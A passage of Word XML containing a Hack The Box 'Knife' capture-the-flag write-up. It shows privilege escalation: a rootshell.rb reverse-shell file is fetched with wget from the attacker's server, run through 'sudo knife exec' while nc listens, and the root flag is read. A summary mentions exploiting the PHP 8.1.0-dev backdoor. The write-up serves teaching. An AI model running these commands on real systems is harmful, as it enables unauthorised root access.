      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
        <w:r w:rsidR="00BD732C">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>9</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t xml:space="preserve"> the python 3 server running</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C7C574A" w14:textId="792DA259" w:rsidR="00066263" w:rsidRDefault="00066263" w:rsidP="0024103C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="66BA22E5" w14:textId="21E3DF8F" w:rsidR="00066263" w:rsidRDefault="00066263" w:rsidP="0024103C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">Now with the web server running in the directory which the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>rootshell.rb</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> file is located</w:t>
      </w:r>
      <w:r w:rsidR="00A94797">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> go to the victim </w:t>
      </w:r>
      <w:r w:rsidR="00F81DD6">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>machine</w:t>
      </w:r>
      <w:r w:rsidR="00A94797">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> and use the standard user shell again.</w:t>
      </w:r>
      <w:r w:rsidR="002968A6">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> Change directory into </w:t>
      </w:r>
      <w:r w:rsidR="002968A6">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>/tmp.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50C1083B" w14:textId="77777777" w:rsidR="004477BB" w:rsidRDefault="004477BB" w:rsidP="0024103C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4951C440" w14:textId="0BDF233B" w:rsidR="002968A6" w:rsidRDefault="002968A6" w:rsidP="0024103C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ab/>
      </w:r>
      <w:r w:rsidR="00392F5F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>c</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>d /tmp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44959C07" w14:textId="3A8F8C8A" w:rsidR="002968A6" w:rsidRDefault="002968A6" w:rsidP="0024103C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="300F555D" w14:textId="3F0E954E" w:rsidR="002968A6" w:rsidRDefault="00392F5F" w:rsidP="0024103C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">Now download the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>rootshell.rb</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> file using </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>wget.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C061BEC" w14:textId="1D105697" w:rsidR="00392F5F" w:rsidRDefault="00392F5F" w:rsidP="0024103C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="16D69E2C" w14:textId="3BA3DFAF" w:rsidR="00392F5F" w:rsidRPr="00392F5F" w:rsidRDefault="00392F5F" w:rsidP="0024103C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ab/>
      </w:r>
      <w:r w:rsidR="00A660AE">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>wget http:your_ip:80/rootshell.rb</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32A4A65B" w14:textId="718EB16B" w:rsidR="00F94965" w:rsidRDefault="00F94965" w:rsidP="0024103C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="269EB871" w14:textId="77777777" w:rsidR="00263760" w:rsidRDefault="00263760" w:rsidP="00263760">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r w:rsidRPr="00263760">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="29DA10D2" wp14:editId="3A201854">
            <wp:extent cx="5731510" cy="170307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5733" w14:textId="65429B6A" w:rsidR="00F94965" w:rsidRPr="000F2F8F" w:rsidRDefault="00263760" w:rsidP="00263760">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
        <w:r w:rsidR="00BD732C">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>10</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t xml:space="preserve"> the output after downloading the 'rootshell.rb' file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="550C80AC" w14:textId="77777777" w:rsidR="00CF0EBE" w:rsidRDefault="00CF0EBE" w:rsidP="00F32A4E"/>
    <w:p w14:paraId="0793FB18" w14:textId="174B13A5" w:rsidR="00217EF2" w:rsidRDefault="007C47F2" w:rsidP="00F32A4E">
      <w:r>
        <w:t xml:space="preserve">Now change the permissions of the </w:t>
      </w:r>
      <w:r w:rsidR="00A3728F">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>rootshell.rb</w:t>
      </w:r>
      <w:r w:rsidR="00A3728F">
        <w:t xml:space="preserve"> file to allow execution.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="363D71CA" w14:textId="6E432BD8" w:rsidR="00A3728F" w:rsidRDefault="00A3728F" w:rsidP="00F32A4E"/>
    <w:p w14:paraId="21F5F907" w14:textId="2BE3638A" w:rsidR="00A3728F" w:rsidRDefault="00A3728F" w:rsidP="00F32A4E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</w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00A3728F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>chmod +x</w:t>
      </w:r>
      <w:r w:rsidR="00E2469A">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> rootshell.rb</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D6E6412" w14:textId="1F01F68F" w:rsidR="00E2469A" w:rsidRDefault="00E2469A" w:rsidP="00F32A4E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="04F1249D" w14:textId="7716AE2B" w:rsidR="0051405D" w:rsidRDefault="0051405D" w:rsidP="00F32A4E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">Set up a listener using netcat to wait for the incoming connection. </w:t>
      </w:r>
      <w:r w:rsidR="0065576F">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">Make sure the listening port is the same </w:t>
      </w:r>
      <w:r w:rsidR="00201F1F">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">as defined in the </w:t>
      </w:r>
      <w:r w:rsidR="00201F1F">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>rootshell.</w:t>
      </w:r>
      <w:r w:rsidR="00201F1F" w:rsidRPr="00201F1F">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>rb</w:t>
      </w:r>
      <w:r w:rsidR="00201F1F">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> file</w:t>
      </w:r>
      <w:r w:rsidR="00B97080">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="00201F1F">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Open</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> a terminal window and type:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="626822D2" w14:textId="500CBEEF" w:rsidR="0051405D" w:rsidRDefault="0051405D" w:rsidP="00F32A4E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1405BF34" w14:textId="60C8876D" w:rsidR="0051405D" w:rsidRDefault="0051405D" w:rsidP="00F32A4E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00B97080">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>n</w:t>
      </w:r>
      <w:r w:rsidR="0065576F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">c </w:t>
      </w:r>
      <w:r w:rsidR="00B97080">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>–nvl</w:t>
      </w:r>
      <w:r w:rsidR="0065576F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>p &lt;port&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08005258" w14:textId="0F63A31C" w:rsidR="00F03E6B" w:rsidRDefault="00F03E6B" w:rsidP="00F32A4E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="488A6462" w14:textId="77777777" w:rsidR="00F03E6B" w:rsidRDefault="00F03E6B" w:rsidP="00F03E6B">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r w:rsidRPr="00F03E6B">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6D40167C" wp14:editId="4EAB7E92">
            <wp:extent cx="3362794" cy="1019317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62794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511EE" w14:textId="7B8502D3" w:rsidR="00F03E6B" w:rsidRPr="0051405D" w:rsidRDefault="00F03E6B" w:rsidP="00F03E6B">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
        <w:r w:rsidR="00BD732C">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>11</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t xml:space="preserve"> netcat listening for an incoming connection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="546AD777" w14:textId="77777777" w:rsidR="00217EF2" w:rsidRPr="00F32A4E" w:rsidRDefault="00217EF2" w:rsidP="00F32A4E"/>
    <w:p w14:paraId="03A36513" w14:textId="448F1235" w:rsidR="004F434F" w:rsidRDefault="005C145A" w:rsidP="00174558">
      <w:r>
        <w:t xml:space="preserve">Execute the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>rootshell.rb</w:t>
      </w:r>
      <w:r w:rsidR="008E16CC">
        <w:t xml:space="preserve"> file on the victim machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FBA5EAF" w14:textId="6BCF3AD6" w:rsidR="008E16CC" w:rsidRDefault="008E16CC" w:rsidP="00174558"/>
    <w:p w14:paraId="081106BA" w14:textId="7A75DDF5" w:rsidR="008E16CC" w:rsidRDefault="008E16CC" w:rsidP="00174558">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="005255AD">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>sudo /usr/bin/knife exec rootshell.rb</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16D0FD36" w14:textId="6A8EC82C" w:rsidR="00A71E9C" w:rsidRDefault="00A71E9C" w:rsidP="00174558">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="31987D49" w14:textId="77777777" w:rsidR="00115000" w:rsidRDefault="00115000" w:rsidP="00115000">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r w:rsidRPr="00115000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4EB328C8" wp14:editId="2FB4C1C7">
            <wp:extent cx="5731510" cy="1064895"/>
            <wp:effectExtent l="0" t="0" r="254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22BBC" w14:textId="73D29A22" w:rsidR="00A71E9C" w:rsidRDefault="00115000" w:rsidP="00115000">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
        <w:r w:rsidR="00BD732C">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>12</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t xml:space="preserve"> shows netcat connected to a root shell 'root@knife'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DC4DDBE" w14:textId="047BCC15" w:rsidR="00115000" w:rsidRDefault="00115000" w:rsidP="00115000"/>
    <w:p w14:paraId="2F209B72" w14:textId="593C1324" w:rsidR="00BD732C" w:rsidRDefault="00115000" w:rsidP="00115000">
      <w:r>
        <w:t>Congratulations, you now have full control over the victim machine</w:t>
      </w:r>
      <w:r w:rsidR="0041512D">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00BD732C">
        <w:t xml:space="preserve"> You can now view the root flag and submit it to the HTB website.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70B71EA5" w14:textId="3C1FA697" w:rsidR="002B414D" w:rsidRDefault="002B414D" w:rsidP="00115000"/>
    <w:p w14:paraId="2546B211" w14:textId="06EA58F7" w:rsidR="002B414D" w:rsidRPr="002B414D" w:rsidRDefault="00916A57" w:rsidP="00115000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>c</w:t>
      </w:r>
      <w:r w:rsidR="005915C8">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>at /root/root.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7732B67C" w14:textId="6F8FABAE" w:rsidR="00BD732C" w:rsidRDefault="00BD732C" w:rsidP="00115000"/>
    <w:p w14:paraId="645D23D4" w14:textId="77777777" w:rsidR="00BD732C" w:rsidRDefault="00BD732C" w:rsidP="00BD732C">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r w:rsidRPr="00BD732C">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="62B05E4A" wp14:editId="231E37D8">
            <wp:extent cx="3677163" cy="866896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1D21" w14:textId="31FF4C78" w:rsidR="00BD732C" w:rsidRPr="00115000" w:rsidRDefault="00BD732C" w:rsidP="00BD732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3</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t xml:space="preserve"> the root flag printed to the terminal</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02C5DFA6" w14:textId="6E4BEFF6" w:rsidR="00032849" w:rsidRDefault="00032849" w:rsidP="00174558"/>
    <w:p w14:paraId="72419D16" w14:textId="5885937E" w:rsidR="00E12A07" w:rsidRDefault="00E12A07" w:rsidP="00174558"/>
    <w:p w14:paraId="1778320D" w14:textId="31601A83" w:rsidR="00E12A07" w:rsidRDefault="00E12A07" w:rsidP="00174558"/>
    <w:p w14:paraId="4EE5E9C2" w14:textId="3A3774D0" w:rsidR="00E12A07" w:rsidRDefault="00E12A07" w:rsidP="00174558"/>
    <w:p w14:paraId="7C892E6B" w14:textId="3E146011" w:rsidR="00E12A07" w:rsidRDefault="00E12A07" w:rsidP="00174558"/>
    <w:p w14:paraId="34709AD0" w14:textId="77777777" w:rsidR="00E12A07" w:rsidRDefault="00E12A07" w:rsidP="00174558"/>
    <w:p w14:paraId="3BA8D20F" w14:textId="64DBA4B6" w:rsidR="006631C3" w:rsidRDefault="0075535E" w:rsidP="006631C3">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="6" w:name="_Toc74569237"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Summary</w:t>
      </w:r>
      <w:bookmarkEnd w:id="6"/>
    </w:p>
    <w:p w14:paraId="7B0B3D5C" w14:textId="3E6A7A23" w:rsidR="00C238A8" w:rsidRDefault="0075535E" w:rsidP="000A4A65">
      <w:r>
        <w:t>During the</w:t>
      </w:r>
      <w:r w:rsidR="00E95477">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>enumeration of the victim machine</w:t>
      </w:r>
      <w:r w:rsidR="00E95477">
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="006B4262">
        <w:t>port 22 (</w:t>
      </w:r>
      <w:r w:rsidR="0062032D">
        <w:t>Open</w:t>
      </w:r>
      <w:r w:rsidR="006B4262">
        <w:t>SSH</w:t>
      </w:r>
      <w:r w:rsidR="00BD4F99">
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="006B4262">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0062032D">
        <w:t>and port 80</w:t>
      </w:r>
      <w:r w:rsidR="002515AB">
        <w:t xml:space="preserve"> (Apache)</w:t>
      </w:r>
      <w:r w:rsidR="002D796A">
        <w:t xml:space="preserve"> were found to be open</w:t>
      </w:r>
      <w:r w:rsidR="007F333D">
        <w:t xml:space="preserve">. After further </w:t>
      </w:r>
      <w:r w:rsidR="002D796A">
        <w:t>enumeration,</w:t>
      </w:r>
      <w:r w:rsidR="007F333D">
        <w:t xml:space="preserve"> the Apache server was found to be running </w:t>
      </w:r>
      <w:r w:rsidR="006D22DF">
        <w:t>the vulnerable PHP 8.1.0-dev</w:t>
      </w:r>
      <w:r w:rsidR="00AE0086">
        <w:t>. This version has a backdoor which allows for remote code execution (RCE)</w:t>
      </w:r>
      <w:r w:rsidR="007E3DF1">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="001749B3">
        <w:t xml:space="preserve"> The vulnerability was exploited </w:t>
      </w:r>
      <w:r w:rsidR="00EE6C4B">
        <w:t xml:space="preserve">using Burpsuite </w:t>
      </w:r>
      <w:r w:rsidR="00C92BF3">
        <w:t xml:space="preserve">to spawn a remote shell from the </w:t>
      </w:r>
      <w:r w:rsidR="00141A0D">
        <w:t>victim’s</w:t>
      </w:r>
      <w:r w:rsidR="00C92BF3">
        <w:t xml:space="preserve"> machine to the </w:t>
      </w:r>
      <w:r w:rsidR="0019651B">
        <w:t>attacker’s</w:t>
      </w:r>
      <w:r w:rsidR="00C92BF3">
        <w:t xml:space="preserve"> machine</w:t>
      </w:r>
      <w:r w:rsidR="00EE6C4B">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00141A0D">
        <w:t xml:space="preserve"> At this point the user flag was captured by viewing </w:t>
      </w:r>
      <w:r w:rsidR="00BF3F1C">
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r w:rsidR="00BF3F1C">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>/home/james/</w:t>
      </w:r>
      <w:r w:rsidR="00DE608A">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>user</w:t>
      </w:r>
      <w:r w:rsidR="00BF3F1C">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>.txt</w:t>
      </w:r>
      <w:r w:rsidR="00BF3F1C">
        <w:t xml:space="preserve"> file</w:t>
      </w:r>
      <w:r w:rsidR="00AF78B1">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="004C5D7A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="004F14DC">
        <w:t>Privilege escalation was required to gain access to the root flag</w:t>
      </w:r>
      <w:r w:rsidR="00C71BBD">
        <w:t xml:space="preserve">. After creating a </w:t>
      </w:r>
      <w:r w:rsidR="0038192B">
        <w:t xml:space="preserve">Ruby </w:t>
      </w:r>
      <w:r w:rsidR="00C71BBD">
        <w:t>file locally on the attacker machine</w:t>
      </w:r>
      <w:r w:rsidR="00DE608A">
        <w:t>, the</w:t>
      </w:r>
      <w:r w:rsidR="0038192B">
        <w:t xml:space="preserve"> code to spawn a reverse shell</w:t>
      </w:r>
      <w:r w:rsidR="00721F15">
        <w:t xml:space="preserve"> was placed within the file</w:t>
      </w:r>
      <w:r w:rsidR="00EE1216">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00721F15">
        <w:t xml:space="preserve"> A Python 3 server was started </w:t>
      </w:r>
      <w:r w:rsidR="00770639">
        <w:t>in the directory that contained the Ruby file</w:t>
      </w:r>
      <w:r w:rsidR="007367A2">
        <w:t>. After changing directory</w:t>
      </w:r>
      <w:r w:rsidR="00F12C10">
        <w:t xml:space="preserve"> to </w:t>
      </w:r>
      <w:r w:rsidR="00F12C10">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>‘/tmp’</w:t>
      </w:r>
      <w:r w:rsidR="00B9057E">
        <w:t xml:space="preserve"> on the attacker machine</w:t>
      </w:r>
      <w:r w:rsidR="00F12C10">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00770639">
        <w:t xml:space="preserve">the file was downloaded </w:t>
      </w:r>
      <w:r w:rsidR="001E6402">
        <w:t xml:space="preserve">by the attacker machine using </w:t>
      </w:r>
      <w:r w:rsidR="001E6402">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>wget</w:t>
      </w:r>
      <w:r w:rsidR="001E6402">
        <w:t>. Once the download was</w:t>
      </w:r>
      <w:r w:rsidR="00817A1D">
        <w:t xml:space="preserve"> complete, the permissions were changed using </w:t>
      </w:r>
      <w:r w:rsidR="0035541B">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>‘</w:t>
      </w:r>
      <w:r w:rsidR="00817A1D">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>chmod</w:t>
      </w:r>
      <w:r w:rsidR="00A112CA">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> +x </w:t>
      </w:r>
      <w:r w:rsidR="00820240">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>rootshell.rb</w:t>
      </w:r>
      <w:r w:rsidR="0035541B">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">’ </w:t>
      </w:r>
      <w:r w:rsidR="0035541B">
        <w:t>to allow execution of the file</w:t>
      </w:r>
      <w:r w:rsidR="007367A2">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00820240">
        <w:t>A</w:t>
      </w:r>
      <w:r w:rsidR="00D160F9">
        <w:t xml:space="preserve"> netcat listener</w:t>
      </w:r>
      <w:r w:rsidR="00153599">
        <w:t xml:space="preserve"> was started on the attacker mach</w:t>
      </w:r>
      <w:r w:rsidR="007908C9">
        <w:t xml:space="preserve">ine to listen for the incoming root shell and </w:t>
      </w:r>
      <w:r w:rsidR="00B661D0">
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r w:rsidR="00B661D0">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>‘rootshell.rb’</w:t>
      </w:r>
      <w:r w:rsidR="00D160F9">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="007908C9">
        <w:t xml:space="preserve">file </w:t>
      </w:r>
      <w:r w:rsidR="00D160F9">
        <w:t>was exe</w:t>
      </w:r>
      <w:r w:rsidR="007908C9">
        <w:t>cuted</w:t>
      </w:r>
      <w:r w:rsidR="00AC2422">
        <w:t xml:space="preserve"> on the victim machine, thus spawning a root shell on the attacker machine.</w:t>
      </w:r>
      <w:r w:rsidR="00820240">
        <w:t xml:space="preserve"> Finally, the root flag was captured by </w:t>
      </w:r>
      <w:r w:rsidR="005C1EE5">
        <w:t xml:space="preserve">viewing the </w:t>
      </w:r>
      <w:r w:rsidR="005C1EE5">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>‘/root/root.txt’</w:t>
      </w:r>
      <w:r w:rsidR="005C1EE5">
        <w:t xml:space="preserve"> file using the </w:t>
      </w:r>
